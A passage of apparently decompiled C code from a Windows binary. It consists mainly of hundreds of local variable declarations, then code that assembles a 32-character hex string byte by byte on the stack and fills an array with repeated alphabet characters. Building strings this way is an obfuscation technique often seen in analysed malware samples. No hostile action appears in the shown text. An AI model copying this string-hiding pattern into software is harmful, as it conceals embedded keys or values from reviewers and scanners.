				short _v1520;
				short _v1522;
				short _v1524;
				short _v1526;
				short _v1528;
				short _v1530;
				short _v1532;
				short _v1534;
				short _v1536;
				short _v1538;
				short _v1540;
				short _v1542;
				short _v1544;
				short _v1546;
				short _v1548;
				short _v1550;
				short _v1552;
				short _v1554;
				short _v1556;
				short _v1558;
				short _v1560;
				short _v1562;
				short _v1564;
				short _v1566;
				short _v1568;
				short _v1570;
				short _v1572;
				short _v1574;
				short _v1576;
				short _v1578;
				short _v1580;
				short _v1582;
				short _v1584;
				short _v1586;
				short _v1588;
				short _v1590;
				short _v1592;
				short _v1594;
				short _v1596;
				short _v1598;
				short _v1600;
				short _v1602;
				short _v1604;
				short _v1606;
				short _v1608;
				short _v1610;
				short _v1612;
				short _v1614;
				short _v1616;
				short _v1618;
				short _v1620;
				short _v1622;
				short _v1624;
				short _v1626;
				short _v1628;
				short _v1630;
				short _v1632;
				short _v1634;
				short _v1636;
				short _v1638;
				short _v1640;
				short _v1642;
				short _v1644;
				short _v1646;
				short _v1648;
				short _v1650;
				short _v1652;
				short _v1654;
				short _v1656;
				short _v1658;
				short _v1660;
				short _v1662;
				short _v1664;
				short _v1666;
				short _v1668;
				short _v1670;
				short _v1672;
				short _v1674;
				short _v1676;
				short _v1678;
				short _v1680;
				short _v1682;
				short _v1684;
				short _v1686;
				short _v1688;
				short _v1690;
				short _v1692;
				short _v1694;
				short _v1696;
				short _v1698;
				short _v1700;
				short _v1702;
				short _v1704;
				short _v1706;
				short _v1708;
				short _v1710;
				short _v1712;
				short _v1714;
				short _v1716;
				short _v1718;
				short _v1720;
				short _v1722;
				short _v1724;
				short _v1726;
				short _v1728;
				short _v1730;
				short _v1732;
				short _v1734;
				short _v1736;
				short _v1738;
				short _v1740;
				short _v1742;
				short _v1744;
				short _v1746;
				short _v1748;
				short _v1750;
				short _v1752;
				short _v1754;
				short _v1756;
				short _v1758;
				short _v1760;
				short _v1762;
				short _v1764;
				short _v1766;
				short _v1768;
				short _v1770;
				short _v1772;
				short _v1774;
				short _v1776;
				short _v1778;
				short _v1780;
				short _v1782;
				short _v1784;
				short _v1786;
				short _v1788;
				short _v1790;
				short _v1792;
				short _v1794;
				short _v1796;
				short _v1798;
				short _v1800;
				short _v1802;
				short _v1804;
				short _v1806;
				short _v1808;
				short _v1810;
				short _v1812;
				short _v1814;
				short _v1816;
				short _v1818;
				short _v1820;
				short _v1822;
				short _v1824;
				short _v1826;
				short _v1828;
				short _v1830;
				short _v1832;
				short _v1834;
				short _v1836;
				short _v1838;
				short _v1840;
				short _v1842;
				short _v1844;
				short _v1846;
				short _v1848;
				short _v1850;
				short _v1852;
				short _v1854;
				short _v1856;
				short _v1858;
				short _v1860;
				short _v1862;
				short _v1864;
				short _v1866;
				short _v1868;
				short _v1870;
				short _v1872;
				short _v1874;
				short _v1876;
				short _v1878;
				short _v1880;
				short _v1882;
				short _v1884;
				short _v1886;
				short _v1888;
				short _v1890;
				short _v1892;
				short _v1894;
				short _v1896;
				short _v1898;
				short _v1900;
				short _v1902;
				short _v1904;
				short _v1906;
				short _v1908;
				short _v1910;
				short _v1912;
				short _v1914;
				short _v1916;
				short _v1918;
				short _v1920;
				short _v1922;
				short _v1924;
				short _v1926;
				short _v1928;
				short _v1930;
				short _v1932;
				short _v1934;
				short _v1936;
				short _v1938;
				short _v1940;
				short _v1942;
				short _v1944;
				short _v1946;
				short _v1948;
				short _v1950;
				short _v1952;
				short _v1954;
				short _v1956;
				short _v1958;
				short _v1960;
				short _v1962;
				short _v1964;
				short _v1966;
				short _v1968;
				short _v1970;
				short _v1972;
				short _v1974;
				short _v1976;
				short _v1978;
				short _v1980;
				short _v1982;
				short _v1984;
				short _v1986;
				short _v1988;
				short _v1990;
				short _v1992;
				short _v1994;
				short _v1996;
				short _v1998;
				short _v2000;
				short _v2002;
				short _v2004;
				short _v2006;
				short _v2008;
				short _v2010;
				short _v2012;
				short _v2014;
				short _v2016;
				short _v2018;
				short _v2020;
				short _v2022;
				short _v2024;
				short _v2026;
				short _v2028;
				short _v2030;
				short _v2032;
				short _v2034;
				short _v2036;
				short _v2038;
				short _v2040;
				short _v2042;
				short _v2044;
				short _v2046;
				short _v2048;
				short _v2050;
				short _v2052;
				short _v2054;
				short _v2056;
				short _v2058;
				short _v2060;
				short _v2062;
				short _v2064;
				short _v2066;
				short _v2068;
				short _v2070;
				short _v2072;
				short _v2074;
				short _v2076;
				short _v2078;
				short _v2080;
				short _v2082;
				short _v2084;
				short _v2086;
				short _v2088;
				short _v2090;
				short _v2092;
				short _v2094;
				short _v2096;
				short _v2098;
				short _v2100;
				short _v2102;
				short _v2104;
				short _v2106;
				short _v2108;
				short _v2110;
				char _v2112;
				intOrPtr _v2116;
				intOrPtr _v2120;
				intOrPtr _v2124;
				intOrPtr _v2128;
				long _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				intOrPtr _v2144;
				intOrPtr _v2148;
				intOrPtr _v2152;
				intOrPtr _v2156;
				intOrPtr _v2160;
				signed int _v2164;
				intOrPtr _v2168;
				intOrPtr _v2172;
				char _v2188;
				char _v2256;
				char _v3296;
				short _t1136;
				short _t1137;
				short _t1138;
				short _t1139;
				short _t1140;
				short _t1141;
				short _t1142;
				short _t1143;
				short _t1144;
				short _t1145;
				short _t1146;
				short _t1147;
				short _t1148;
				short _t1149;
				short _t1150;
				short _t1151;
				short _t1152;
				short _t1153;
				short _t1154;
				short _t1155;
				short _t1156;
				short _t1157;
				short _t1158;
				short _t1159;
				short _t1160;
				short _t1161;
				short _t1162;
				short _t1163;
				short _t1164;
				short _t1165;
				short _t1166;
				short _t1167;
				short _t1168;
				short _t1169;
				short _t1170;
				short _t1171;
				short _t1172;
				short _t1173;
				short _t1174;
				short _t1175;
				short _t1176;
				short _t1177;
				short _t1178;
				short _t1179;
				short _t1180;
				short _t1181;
				short _t1182;
				short _t1183;
				short _t1184;
				short _t1185;
				short _t1186;
				short _t1187;
				short _t1188;
				short _t1189;
				short _t1190;
				short _t1191;
				short _t1192;
				short _t1193;
				short _t1194;
				short _t1195;
				short _t1196;
				short _t1197;
				short _t1198;
				short _t1199;
				short _t1200;
				short _t1201;
				short _t1202;
				short _t1203;
				short _t1204;
				short _t1205;
				short _t1206;
				short _t1207;
				short _t1208;
				short _t1209;
				short _t1210;
				short _t1211;
				short _t1212;
				short _t1213;
				short _t1214;
				short _t1215;
				short _t1216;
				short _t1217;
				short _t1218;
				short _t1219;
				short _t1220;
				short _t1221;
				short _t1222;
				short _t1223;
				short _t1224;
				short _t1225;
				short _t1226;
				short _t1227;
				short _t1228;
				short _t1229;
				short _t1230;
				short _t1231;
				short _t1232;
				short _t1233;
				short _t1234;
				short _t1235;
				short _t1236;
				short _t1237;
				short _t1238;
				short _t1239;
				short _t1240;
				short _t1241;
				short _t1242;
				short _t1243;
				short _t1244;
				short _t1245;
				short _t1246;
				short _t1247;
				short _t1248;
				short _t1249;
				short _t1250;
				short _t1251;
				short _t1252;
				short _t1253;
				short _t1254;
				short _t1255;
				short _t1256;
				short _t1257;
				short _t1258;
				short _t1259;
				short _t1260;
				short _t1261;
				short _t1262;
				short _t1263;
				short _t1264;
				short _t1265;
				short _t1266;
				short _t1267;
				short _t1268;
				short _t1269;
				short _t1270;
				short _t1271;
				short _t1272;
				short _t1273;
				short _t1274;
				short _t1275;
				short _t1276;
				short _t1277;
				short _t1278;
				short _t1279;
				short _t1280;
				short _t1281;
				short _t1282;
				short _t1283;
				short _t1284;
				short _t1285;
				short _t1286;
				short _t1287;
				short _t1288;
				short _t1289;
				short _t1290;
				short _t1291;
				short _t1292;
				short _t1293;
				short _t1294;
				short _t1295;
				short _t1296;
				short _t1297;
				short _t1298;
				short _t1299;
				short _t1300;
				short _t1301;
				short _t1302;
				short _t1303;
				short _t1304;
				short _t1305;
				short _t1306;
				short _t1307;
				short _t1308;
				short _t1309;
				short _t1310;
				short _t1311;
				short _t1312;
				short _t1313;
				short _t1314;
				short _t1315;
				short _t1316;
				short _t1317;
				short _t1318;
				short _t1319;
				short _t1320;
				short _t1321;
				short _t1322;
				short _t1323;
				short _t1324;
				short _t1325;
				short _t1326;
				short _t1327;
				short _t1328;
				short _t1329;
				short _t1330;
				short _t1331;
				short _t1332;
				short _t1333;
				short _t1334;
				short _t1335;
				short _t1336;
				short _t1337;
				short _t1338;
				short _t1339;
				short _t1340;
				short _t1341;
				short _t1342;
				short _t1343;
				short _t1344;
				short _t1345;
				short _t1346;
				short _t1347;
				short _t1348;
				short _t1349;
				short _t1350;
				short _t1351;
				short _t1352;
				short _t1353;
				short _t1354;
				short _t1355;
				short _t1356;
				short _t1357;
				short _t1358;
				short _t1359;
				short _t1360;
				short _t1361;
				short _t1362;
				short _t1363;
				short _t1364;
				short _t1365;
				short _t1366;
				short _t1367;
				short _t1368;
				short _t1369;
				short _t1370;
				short _t1371;
				short _t1372;
				short _t1373;
				short _t1374;
				short _t1375;
				short _t1376;
				short _t1377;
				short _t1378;
				short _t1379;
				short _t1380;
				short _t1381;
				short _t1382;
				short _t1383;
				short _t1384;
				short _t1385;
				short _t1386;
				short _t1387;
				short _t1388;
				short _t1389;
				short _t1390;
				short _t1391;
				short _t1392;
				short _t1393;
				short _t1394;
				short _t1395;
				short _t1396;
				short _t1397;
				short _t1398;
				short _t1399;
				short _t1400;
				short _t1401;
				short _t1402;
				short _t1403;
				short _t1404;
				short _t1405;
				short _t1406;
				short _t1407;
				short _t1408;
				short _t1409;
				short _t1410;
				short _t1411;
				short _t1412;
				short _t1413;
				short _t1414;
				short _t1415;
				short _t1416;
				short _t1417;
				short _t1418;
				short _t1419;
				short _t1420;
				short _t1421;
				short _t1422;
				short _t1423;
				short _t1424;
				short _t1425;
				short _t1426;
				short _t1427;
				short _t1428;
				short _t1429;
				short _t1430;
				short _t1431;
				short _t1432;
				short _t1433;
				short _t1434;
				short _t1435;
				short _t1436;
				short _t1437;
				short _t1438;
				short _t1439;
				short _t1440;
				short _t1441;
				short _t1442;
				short _t1443;
				short _t1444;
				short _t1445;
				short _t1446;
				short _t1447;
				short _t1448;
				short _t1449;
				short _t1450;
				short _t1451;
				short _t1452;
				short _t1453;
				short _t1454;
				short _t1455;
				short _t1456;
				short _t1457;
				short _t1458;
				short _t1459;
				short _t1460;
				short _t1461;
				short _t1462;
				short _t1463;
				short _t1464;
				short _t1465;
				short _t1466;
				short _t1467;
				short _t1468;
				short _t1469;
				short _t1470;
				short _t1471;
				short _t1472;
				short _t1473;
				short _t1475;
				short _t1476;
				short _t1477;
				short _t1478;
				short _t1479;
				short _t1480;
				short _t1481;
				short _t1482;
				short _t1483;
				short _t1484;
				short _t1485;
				short _t1486;
				short _t1487;
				short _t1488;
				short _t1489;
				short _t1490;
				short _t1491;
				short _t1492;
				short _t1493;
				short _t1494;
				short _t1495;
				short _t1496;
				short _t1497;
				short _t1498;
				short _t1499;
				short _t1500;
				short _t1501;
				short _t1502;
				short _t1503;
				short _t1504;
				short _t1505;
				short _t1506;
				short _t1507;
				short _t1508;
				short _t1509;
				short _t1510;
				short _t1511;
				short _t1512;
				short _t1513;
				short _t1514;
				short _t1515;
				short _t1516;
				short _t1517;
				short _t1518;
				short _t1519;
				short _t1520;
				short _t1521;
				short _t1522;
				short _t1523;
				short _t1524;
				short _t1525;
				short _t1526;
				short _t1527;
				short _t1528;
				short _t1529;
				short _t1530;
				short _t1531;
				short _t1532;
				short _t1533;
				short _t1534;
				short _t1535;
				short _t1536;
				short _t1537;
				short _t1538;
				short _t1539;
				short _t1540;
				short _t1541;
				short _t1542;
				short _t1543;
				short _t1544;
				short _t1545;
				short _t1546;
				short _t1547;
				short _t1548;
				short _t1549;
				short _t1550;
				short _t1551;
				short _t1552;
				short _t1553;
				short _t1554;
				short _t1555;
				short _t1556;
				short _t1557;
				short _t1558;
				short _t1559;
				short _t1560;
				short _t1561;
				short _t1562;
				short _t1563;
				short _t1564;
				short _t1565;
				short _t1566;
				short _t1567;
				short _t1568;
				short _t1569;
				short _t1570;
				short _t1571;
				short _t1572;
				short _t1573;
				short _t1574;
				short _t1575;
				short _t1576;
				short _t1577;
				short _t1578;
				short _t1579;
				short _t1580;
				short _t1581;
				short _t1582;
				short _t1583;
				short _t1584;
				short _t1585;
				short _t1586;
				short _t1587;
				short _t1588;
				short _t1589;
				short _t1590;
				short _t1591;
				short _t1592;
				short _t1593;
				short _t1594;
				short _t1595;
				short _t1596;
				short _t1597;
				short _t1598;
				short _t1599;
				short _t1600;
				short _t1601;
				short _t1602;
				short _t1603;
				short _t1604;
				short _t1605;
				short _t1606;
				short _t1607;
				short _t1608;
				short _t1609;
				short _t1610;
				short _t1611;
				short _t1612;
				short _t1613;
				short _t1614;
				short _t1615;
				short _t1616;
				short _t1617;
				short _t1618;
				short _t1619;
				short _t1620;
				short _t1621;
				short _t1622;
				short _t1623;
				short _t1624;
				short _t1625;
				short _t1626;
				short _t1627;
				short _t1628;
				short _t1629;
				short _t1630;
				short _t1631;
				short _t1632;
				short _t1633;
				short _t1634;
				short _t1635;
				short _t1636;
				short _t1637;
				short _t1638;
				short _t1639;
				short _t1640;
				short _t1641;
				short _t1642;
				short _t1643;
				short _t1644;
				short _t1645;
				short _t1646;
				short _t1647;
				short _t1648;
				short _t1649;
				short _t1650;
				short _t1651;
				short _t1652;
				short _t1653;
				short _t1654;
				short _t1655;
				short _t1656;
				short _t1657;
				short _t1658;
				short _t1659;
				short _t1660;
				short _t1661;
				short _t1662;
				short _t1663;
				short _t1664;
				short _t1665;
				short _t1666;
				short _t1667;
				short _t1668;
				short _t1669;
				short _t1670;
				short _t1671;
				short _t1672;
				short _t1673;
				short _t1674;
				short _t1675;
				short _t1676;
				short _t1677;
				short _t1678;
				short _t1679;
				short _t1680;
				short _t1681;
				short _t1682;
				short _t1683;
				short _t1684;
				short _t1685;
				short _t1686;
				short _t1687;
				short _t1688;
				short _t1689;
				short _t1690;
				short _t1691;
				short _t1692;
				short _t1693;
				short _t1694;
				short _t1695;
				short _t1696;
				short _t1697;
				short _t1698;
				short _t1699;
				short _t1700;
				short _t1701;
				short _t1702;
				short _t1703;
				short _t1704;
				short _t1705;
				short _t1706;
				short _t1707;
				short _t1708;
				short _t1709;
				short _t1710;
				short _t1711;
				short _t1712;
				short _t1713;
				short _t1714;
				short _t1715;
				short _t1716;
				short _t1717;
				short _t1718;
				short _t1719;
				short _t1720;
				short _t1721;
				short _t1722;
				short _t1723;
				short _t1724;
				short _t1725;
				short _t1726;
				short _t1727;
				short _t1728;
				short _t1729;
				short _t1730;
				short _t1731;
				short _t1732;
				short _t1733;
				short _t1734;
				short _t1735;
				short _t1736;
				short _t1737;
				short _t1738;
				short _t1739;
				short _t1740;
				short _t1741;
				short _t1742;
				short _t1743;
				short _t1744;
				short _t1745;
				short _t1746;
				short _t1747;
				short _t1748;
				short _t1749;
				short _t1750;
				short _t1751;
				short _t1752;
				short _t1753;
				short _t1754;
				short _t1755;
				short _t1756;
				short _t1757;
				short _t1758;
				short _t1759;
				short _t1760;
				short _t1761;
				short _t1762;
				short _t1763;
				short _t1764;
				short _t1765;
				short _t1766;
				short _t1767;
				short _t1768;
				short _t1769;
				short _t1770;
				short _t1771;
				short _t1772;
				short _t1773;
				short _t1774;
				short _t1775;
				short _t1776;
				short _t1777;
				short _t1778;
				short _t1779;
				short _t1780;
				short _t1781;
				short _t1782;
				short _t1783;
				short _t1784;
				short _t1785;
				short _t1786;
				short _t1787;
				short _t1788;
				short _t1789;
				short _t1790;
				short _t1791;
				short _t1792;
				short _t1793;
				short _t1794;
				short _t1795;
				short _t1796;
				short _t1797;
				short _t1798;
				short _t1799;
				short _t1800;
				short _t1801;
				short _t1802;
				short _t1803;
				short _t1804;
				short _t1805;
				short _t1806;
				short _t1807;
				short _t1808;
				short _t1809;
				short _t1810;
				short _t1811;
				short _t1812;
				short _t1813;
				short _t1814;
				short _t1815;
				short _t1816;
				short _t1818;
				short _t1819;
				short _t1820;
				short _t1821;
				short _t1822;
				short _t1823;
				short _t1824;
				short _t1825;
				short _t1826;
				short _t1827;
				short _t1828;
				short _t1829;
				short _t1830;
				short _t1831;
				short _t1832;
				short _t1833;
				short _t1834;
				short _t1835;
				short _t1836;
				short _t1837;
				short _t1838;
				short _t1839;
				short _t1840;
				short _t1841;
				short _t1842;
				short _t1843;
				short _t1844;
				short _t1845;
				short _t1846;
				short _t1847;
				short _t1848;
				short _t1849;
				short _t1850;
				short _t1851;
				short _t1852;
				short _t1853;
				short _t1854;
				short _t1855;
				short _t1856;
				short _t1857;
				short _t1858;
				short _t1859;
				short _t1860;
				short _t1861;
				short _t1862;
				short _t1863;
				short _t1864;
				short _t1865;
				short _t1866;
				short _t1867;
				short _t1868;
				short _t1869;
				short _t1870;
				short _t1871;
				short _t1872;
				short _t1873;
				short _t1874;
				short _t1875;
				short _t1876;
				short _t1877;
				short _t1878;
				short _t1879;
				short _t1880;
				short _t1881;
				short _t1882;
				short _t1883;
				short _t1884;
				short _t1885;
				short _t1886;
				short _t1887;
				short _t1888;
				short _t1889;
				short _t1890;
				short _t1891;
				short _t1892;
				short _t1893;
				short _t1894;
				short _t1895;
				short _t1896;
				short _t1897;
				short _t1898;
				short _t1899;
				short _t1900;
				short _t1901;
				short _t1902;
				short _t1903;
				short _t1904;
				short _t1905;
				short _t1906;
				short _t1907;
				short _t1908;
				short _t1909;
				short _t1910;
				short _t1911;
				short _t1912;
				short _t1913;
				short _t1914;
				short _t1915;
				short _t1916;
				short _t1917;
				short _t1918;
				short _t1919;
				short _t1920;
				short _t1921;
				short _t1922;
				short _t1923;
				short _t1924;
				short _t1925;
				short _t1926;
				short _t1927;
				short _t1928;
				short _t1929;
				short _t1930;
				short _t1931;
				short _t1932;
				short _t1933;
				short _t1934;
				short _t1935;
				short _t1936;
				short _t1937;
				short _t1938;
				short _t1939;
				short _t1940;
				short _t1941;
				short _t1942;
				short _t1943;
				short _t1944;
				short _t1945;
				short _t1946;
				short _t1947;
				short _t1948;
				short _t1949;
				short _t1950;
				short _t1951;
				short _t1952;
				short _t1953;
				short _t1954;
				short _t1955;
				short _t1956;
				short _t1957;
				short _t1958;
				short _t1959;
				short _t1960;
				short _t1961;
				short _t1962;
				short _t1963;
				short _t1964;
				short _t1965;
				short _t1966;
				short _t1967;
				short _t1968;
				short _t1969;
				short _t1970;
				short _t1971;
				short _t1972;
				short _t1973;
				short _t1974;
				short _t1975;
				short _t1976;
				short _t1977;
				short _t1978;
				short _t1979;
				short _t1980;
				short _t1981;
				short _t1982;
				short _t1983;
				short _t1984;
				short _t1985;
				short _t1986;
				short _t1987;
				short _t1988;
				short _t1989;
				short _t1990;
				short _t1991;
				short _t1992;
				short _t1993;
				short _t1994;
				short _t1995;
				short _t1996;
				short _t1997;
				short _t1998;
				short _t1999;
				short _t2000;
				short _t2001;
				short _t2002;
				short _t2003;
				short _t2004;
				short _t2005;
				short _t2006;
				short _t2007;
				short _t2008;
				short _t2009;
				short _t2010;
				short _t2011;
				short _t2012;
				short _t2013;
				short _t2014;
				short _t2015;
				short _t2016;
				short _t2017;
				short _t2018;
				short _t2019;
				short _t2020;
				short _t2021;
				short _t2022;
				short _t2023;
				short _t2024;
				short _t2025;
				short _t2026;
				short _t2027;
				short _t2028;
				short _t2029;
				short _t2030;
				short _t2031;
				short _t2032;
				short _t2033;
				short _t2034;
				short _t2035;
				short _t2036;
				short _t2037;
				short _t2038;
				short _t2039;
				short _t2040;
				short _t2041;
				short _t2042;
				short _t2043;
				short _t2044;
				short _t2045;
				short _t2046;
				short _t2047;
				short _t2048;
				short _t2049;
				short _t2050;
				short _t2051;
				short _t2052;
				short _t2053;
				short _t2054;
				short _t2055;
				short _t2056;
				short _t2057;
				short _t2058;
				short _t2059;
				short _t2060;
				short _t2061;
				short _t2062;
				short _t2063;
				short _t2064;
				short _t2065;
				short _t2066;
				short _t2067;
				short _t2068;
				short _t2069;
				short _t2070;
				short _t2071;
				short _t2072;
				short _t2073;
				short _t2074;
				short _t2075;
				short _t2076;
				short _t2077;
				short _t2078;
				short _t2079;
				short _t2080;
				short _t2081;
				short _t2082;
				short _t2083;
				short _t2084;
				short _t2085;
				short _t2086;
				short _t2087;
				short _t2088;
				short _t2089;
				short _t2090;
				short _t2091;
				short _t2092;
				short _t2093;
				short _t2094;
				short _t2095;
				short _t2096;
				short _t2097;
				short _t2098;
				short _t2099;
				short _t2100;
				short _t2101;
				short _t2102;
				short _t2103;
				short _t2104;
				short _t2105;
				short _t2106;
				short _t2107;
				short _t2108;
				short _t2109;
				short _t2110;
				short _t2111;
				short _t2112;
				short _t2113;
				short _t2114;
				short _t2115;
				short _t2116;
				short _t2117;
				short _t2118;
				short _t2119;
				short _t2120;
				short _t2121;
				short _t2122;
				short _t2123;
				short _t2124;
				short _t2125;
				short _t2126;
				short _t2127;
				short _t2128;
				short _t2129;
				short _t2130;
				short _t2131;
				short _t2132;
				short _t2133;
				short _t2134;
				short _t2135;
				short _t2136;
				short _t2137;
				short _t2138;
				short _t2139;
				short _t2140;
				short _t2141;
				short _t2142;
				short _t2143;
				short _t2144;
				short _t2145;
				short _t2146;
				short _t2147;
				short _t2148;
				short _t2149;
				short _t2150;
				short _t2151;
				short _t2152;
				short _t2153;
				short _t2154;
				short _t2155;
				signed int _t2169;
				void* _t2171;
				void* _t2179;
				signed int _t2180;
				void* _t2181;
				int _t2183;
				int _t2186;
				signed int _t2196;
				void* _t2198;
				signed int _t2199;
				void* _t2201;
				signed int _t2202;
				void* _t2204;
				void* _t2205;
				void* _t2206;
				void* _t2207;
				void* _t2208;

				_t2208 = __eflags;
				_t2206 = __edx;
				_t2205 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v2132 = _v2132 & 0x00000000;
				_v56 = 0x39;
				_v55 = 0x31;
				_v54 = 0x30;
				_v53 = 0x31;
				_v52 = 0x37;
				_v51 = 0x33;
				_v50 = 0x62;
				_v49 = 0x30;
				_v48 = 0x39;
				_v47 = 0x31;
				_v46 = 0x35;
				_v45 = 0x35;
				_v44 = 0x34;
				_v43 = 0x36;
				_v42 = 0x35;
				_v41 = 0x66;
				_v40 = 0x38;
				_v39 = 0x33;
				_v38 = 0x61;
				_v37 = 0x62;
				_v36 = 0x61;
				_v35 = 0x61;
				_v34 = 0x30;
				_v33 = 0x31;
				_v32 = 0x63;
				_v31 = 0x32;
				_v30 = 0x36;
				_v29 = 0x33;
				_v28 = 0x35;
				_v27 = 0x66;
				_v26 = 0x62;
				_v25 = 0x64;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v2164 = _v2164 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t1136 = 0x61;
				_v1424 = _t1136;
				_t1137 = 0x62;
				_v1422 = _t1137;
				_t1138 = 0x63;
				_v1420 = _t1138;
				_t1139 = 0x64;
				_v1418 = _t1139;
				_t1140 = 0x65;
				_v1416 = _t1140;
				_t1141 = 0x66;
				_v1414 = _t1141;
				_t1142 = 0x67;
				_v1412 = _t1142;
				_t1143 = 0x68;
				_v1410 = _t1143;
				_t1144 = 0x69;
				_v1408 = _t1144;
				_t1145 = 0x6a;
				_v1406 = _t1145;
				_t1146 = 0x6b;
				_v1404 = _t1146;
				_t1147 = 0x6c;
				_v1402 = _t1147;
				_t1148 = 0x6d;
				_v1400 = _t1148;
				_t1149 = 0x6e;
				_v1398 = _t1149;
				_t1150 = 0x6f;
				_v1396 = _t1150;
				_t1151 = 0x70;
				_v1394 = _t1151;
				_t1152 = 0x71;
				_v1392 = _t1152;
				_t1153 = 0x72;
				_v1390 = _t1153;
				_t1154 = 0x73;
				_v1388 = _t1154;
				_t1155 = 0x74;
				_v1386 = _t1155;
				_t1156 = 0x75;
				_v1384 = _t1156;
				_t1157 = 0x76;
				_v1382 = _t1157;
				_t1158 = 0x77;
				_v1380 = _t1158;
				_t1159 = 0x78;
				_v1378 = _t1159;
				_t1160 = 0x79;
				_v1376 = _t1160;
				_t1161 = 0x7a;
				_v1374 = _t1161;
				_t1162 = 0x61;
				_v1372 = _t1162;
				_t1163 = 0x62;
				_v1370 = _t1163;
				_t1164 = 0x63;
				_v1368 = _t1164;
				_t1165 = 0x64;
				_v1366 = _t1165;
				_t1166 = 0x65;
				_v1364 = _t1166;
				_t1167 = 0x66;
				_v1362 = _t1167;
				_t1168 = 0x67;
				_v1360 = _t1168;
				_t1169 = 0x68;
				_v1358 = _t1169;
				_t1170 = 0x69;
				_v1356 = _t1170;
				_t1171 = 0x6a;
				_v1354 = _t1171;
				_t1172 = 0x6b;
				_v1352 = _t1172;
				_t1173 = 0x6c;
				_v1350 = _t1173;
				_t1174 = 0x6d;
				_v1348 = _t1174;
				_t1175 = 0x6e;
				_v1346 = _t1175;
				_t1176 = 0x6f;
				_v1344 = _t1176;
				_t1177 = 0x70;
				_v1342 = _t1177;
				_t1178 = 0x71;
				_v1340 = _t1178;
				_t1179 = 0x72;
				_v1338 = _t1179;
				_t1180 = 0x73;
				_v1336 = _t1180;
				_t1181 = 0x74;
				_v1334 = _t1181;
				_t1182 = 0x75;
				_v1332 = _t1182;
				_t1183 = 0x76;
				_v1330 = _t1183;
				_t1184 = 0x77;
				_v1328 = _t1184;
				_t1185 = 0x78;
				_v1326 = _t1185;
				_t1186 = 0x79;
				_v1324 = _t1186;
				_t1187 = 0x7a;
				_v1322 = _t1187;
				_t1188 = 0x61;
				_v1320 = _t1188;
				_t1189 = 0x62;
				_v1318 = _t1189;
				_t1190 = 0x63;
				_v1316 = _t1190;
				_t1191 = 0x64;
				_v1314 = _t1191;
				_t1192 = 0x65;
				_v1312 = _t1192;
				_t1193 = 0x66;
				_v1310 = _t1193;
				_t1194 = 0x67;
				_v1308 = _t1194;
				_t1195 = 0x68;
				_v1306 = _t1195;
				_t1196 = 0x69;
				_v1304 = _t1196;
				_t1197 = 0x6a;
				_v1302 = _t1197;
				_t1198 = 0x6b;
				_v1300 = _t1198;
				_t1199 = 0x6c;
				_v1298 = _t1199;
				_t1200 = 0x6d;
				_v1296 = _t1200;
				_t1201 = 0x6e;
				_v1294 = _t1201;
				_t1202 = 0x6f;
				_v1292 = _t1202;
				_t1203 = 0x70;
				_v1290 = _t1203;
				_t1204 = 0x71;
				_v1288 = _t1204;
				_t1205 = 0x72;
				_v1286 = _t1205;
				_t1206 = 0x73;
				_v1284 = _t1206;
				_t1207 = 0x74;
				_v1282 = _t1207;
				_t1208 = 0x75;
				_v1280 = _t1208;
				_t1209 = 0x76;
				_v1278 = _t1209;
				_t1210 = 0x77;
				_v1276 = _t1210;
				_t1211 = 0x78;
				_v1274 = _t1211;
				_t1212 = 0x79;
				_v1272 = _t1212;
				_t1213 = 0x7a;
				_v1270 = _t1213;
				_t1214 = 0x61;
				_v1268 = _t1214;
				_t1215 = 0x62;
				_v1266 = _t1215;
				_t1216 = 0x63;
				_v1264 = _t1216;
				_t1217 = 0x64;
				_v1262 = _t1217;
				_t1218 = 0x65;
				_v1260 = _t1218;
				_t1219 = 0x66;
				_v1258 = _t1219;
				_t1220 = 0x67;
				_v1256 = _t1220;
				_t1221 = 0x68;
				_v1254 = _t1221;
				_t1222 = 0x69;
				_v1252 = _t1222;
				_t1223 = 0x6a;
				_v1250 = _t1223;
				_t1224 = 0x6b;
				_v1248 = _t1224;
				_t1225 = 0x6c;
				_v1246 = _t1225;
				_t1226 = 0x6d;
				_v1244 = _t1226;
				_t1227 = 0x6e;
				_v1242 = _t1227;
				_t1228 = 0x6f;
				_v1240 = _t1228;
				_t1229 = 0x70;
				_v1238 = _t1229;
				_t1230 = 0x71;
				_v1236 = _t1230;
				_t1231 = 0x72;
				_v1234 = _t1231;
				_t1232 = 0x73;
				_v1232 = _t1232;
				_t1233 = 0x74;
				_v1230 = _t1233;
				_t1234 = 0x75;
				_v1228 = _t1234;
				_t1235 = 0x76;
				_v1226 = _t1235;
				_t1236 = 0x77;
				_v1224 = _t1236;
				_t1237 = 0x78;
				_v1222 = _t1237;
				_t1238 = 0x79;
				_v1220 = _t1238;
				_t1239 = 0x7a;
				_v1218 = _t1239;
				_t1240 = 0x61;
				_v1216 = _t1240;
				_t1241 = 0x62;
				_v1214 = _t1241;
				_t1242 = 0x63;
				_v1212 = _t1242;
				_t1243 = 0x64;
				_v1210 = _t1243;
				_t1244 = 0x65;
				_v1208 = _t1244;
				_t1245 = 0x66;
				_v1206 = _t1245;
				_t1246 = 0x67;
				_v1204 = _t1246;
				_t1247 = 0x68;
				_v1202 = _t1247;
				_t1248 = 0x69;
				_v1200 = _t1248;
				_t1249 = 0x6a;
				_v1198 = _t1249;
				_t1250 = 0x6b;
				_v1196 = _t1250;
				_t1251 = 0x6c;
				_v1194 = _t1251;
				_t1252 = 0x6d;
				_v1192 = _t1252;
				_t1253 = 0x6e;
				_v1190 = _t1253;
				_t1254 = 0x6f;
				_v1188 = _t1254;
				_t1255 = 0x70;
				_v1186 = _t1255;
				_t1256 = 0x71;
				_v1184 = _t1256;
				_t1257 = 0x72;
				_v1182 = _t1257;
				_t1258 = 0x73;
				_v1180 = _t1258;
				_t1259 = 0x74;
				_v1178 = _t1259;
				_t1260 = 0x75;
				_v1176 = _t1260;
				_t1261 = 0x76;
				_v1174 = _t1261;
				_t1262 = 0x77;
				_v1172 = _t1262;
				_t1263 = 0x78;
				_v1170 = _t1263;
				_t1264 = 0x79;
				_v1168 = _t1264;
				_t1265 = 0x7a;
				_v1166 = _t1265;
				_t1266 = 0x61;
				_v1164 = _t1266;
				_t1267 = 0x62;
				_v1162 = _t1267;
				_t1268 = 0x63;
				_v1160 = _t1268;
				_t1269 = 0x64;
				_v1158 = _t1269;
				_t1270 = 0x65;
				_v1156 = _t1270;
				_t1271 = 0x66;
				_v1154 = _t1271;
